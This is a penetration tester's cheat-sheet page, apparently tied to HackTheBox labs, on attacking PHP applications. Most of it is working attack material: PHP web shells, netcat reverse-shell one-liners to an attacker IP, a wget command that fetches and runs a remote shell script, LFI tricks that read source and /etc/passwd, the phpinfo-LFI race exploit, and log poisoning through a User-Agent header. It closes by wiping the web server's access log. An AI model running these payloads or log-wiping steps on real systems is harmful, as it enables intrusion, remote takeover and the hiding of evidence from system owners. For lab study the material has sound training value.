# php

## Basics

* Combined with a[ Local File Inclusion](https://pentest.mxhx.org/04-webapps/lfi), you can make php get you a shell
* REF: [phpLite](https://pentest.mxhx.org/04-webapps/phplite), ninevehHTB, [WebInjections](https://pentest.mxhx.org/04-webapps/03-webapp), [ReverseShells](https://pentest.mxhx.org/03-getting-in/03-reverseshell-php#php-web-shell)
* Make sure to URL Encode your Injection with [Burp](https://pentest.mxhx.org/02-scanning/burp#url-encode) or [MeyerWeb](https://meyerweb.com/eric/tools/dencoder/)

## Reverse Shell

* Two options to try:

```
<?php system($_GET["cmd"]); ?>               ..should work
<?php echo system($_REQUEST ["cmd"]); ?>     ..one I normally see

http://web/hi.php?notes=/../note.php&cmd=nc -e /bin/sh 10.x.x.x 4444
http://web/hi.php?notes=/../note.php&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 > /tmp/f
```

## Downloading

```
<?php system("wget $IP/shell.php -O /tmp/shell.php; php /tmp/shell.php"); ?>
```

## php explore

* REF: poisonHTB

```
https://$IP/phpinfo.php                 ..Found: file_uploads 'On'
https://$IP/browse.php                  ..page can run local php scripts
https://$IP/browse.php?file=Hello       ..fail
https://$IP/browse.php?file=index.php   ..ok

Encode to view Source:
https://$IP/browse.php?file=php://filter/convert.base64-encode/resource=index.php   ..encodes b64
echo PD9waHAKcHJ.. | base64 -d  ..<?php print_r(ini_get_all());?>

https://$IP/browse.php?file=http://$MyIP/Anyfile   ..http wrapper disabled
https://$IP/browse.php?file=ftp://$MyIP/Anyfile    ..ftp wrapper disabled
https://$IP/browse.php?file=expect://ls            ..unable to find wrapper
https://$IP/browse.php?file=/etc/passwd            ..ok (found username)
```

## phpinfo - fileupload - vulnerability

* Check options for: **phpinfo.php**
* If 'fileupload = ON' - it will receive any files you send.
* php will save them to a cache directory (normally not available to users)
* But with an LFI you may get code-execution
* Test with Burp Intercept:

```
POST /phpinfo.php HTTP/1.1   
Content-Type: multipart/form-data; boundary=--HelloWorld

----HelloWorld
Content-Disposition: form-data; name="blah"; filename="TestFile"
Content-Type: text/plain
Does this work
----HelloWorld

View phpinfo results to see if our file was accepted:
"PHP Variables"            ..header
_FILES("blah")             ..found!
```

## phpinfo - LFI

* <https://insomniasec.com/cdn-assets/LFI_With_PHPInfo_Assistance.pdf>
* Github > [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) > FileInclusion > **phpinfolfi.py**

```
---------------------
---------------------
Replace the PAYLOAD with a full reverse-payload
PAYLOAD="""$s\r<?php...;?> \r""" % TAG
(keep all the weird bits.. just focus on swapping the php line
<?php...;?>

---------------------
---------------------
locate php-reverse
php-reverse-shell.php
paste into phpinfolfi.py as 'payload'
<?php...?>
update ip, port
del comments
LFIREQ="""GET... /browse.php?file=%s HTTP/1.1\r
i = d.find("[tmp_name] =>")    ..problem
i = d.find("[tmp_name] =&gt")  ..fixed twice in script

---------------------
---------------------
python phpinfolfi.py $IP 80 100
.. port 80
.. threads 100

nc -nvlp 9001  ..got a shell
```

## Log Poisoning

* Submit an evil log entry (custom User-Agent)
* Execute it Viewing the log with an LFI
* If php tags are 'hidden' then they are interpreted, and we can inject our payload
* REF: [php](https://pentest.mxhx.org/04-webapps/php-tricks), poisonHTB

```
TEST 1

View Log:
https://$IP/browse.php > /var/log/httpd-access.log
curl https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log

Burp > Repeater > Custom "User-Agent"
https://$IP/doesntmatter
User-Agent: Hello World

Confirm:
Notice "Hello World" was sent as the User-Agent
We have control over this field, and we can send malicious payload here
```

```
TEST 2

Burp > Repeater > Custom "User-Agent"
https://$IP/doesntmatter
User-Agent: <?php echo('Hello World'); ?>

https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log
We see "Hello World" in the log
php-tags were read (ie: dont see them written in plain-text)
Meaning we have execution!
```

```
EXPLOIT

Burp > Repeater > Custom "User-Agent"
GET /doesntmatter HTTP/1.1
User-Agent: <?php system($_REQUEST['cmd']) ?>

https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=hostname
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls -la
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=uname -a
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 10.x.x.x 4444 >/tmp/f
(might need burp url-encode)

nc -nvlp 4444  ..connected!
```

```
bsd reverse netcat
bsd doesnt like the 'normal' reverse

normal:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 9002 >/tmp/f

bsd version:
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc 10.x.x.x 4444 >/tmp/f            ..ippsec
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 10.x.x.x 4444 >/tmp/f   ..maybe
```

```
Log issue:

vi /var/log/httpd-access.log
delete our bad-line from earlier mistake, oops
because we used echo "Hello World" with double-quotes

Wipe the log file:
echo "" > httpd-access.log
```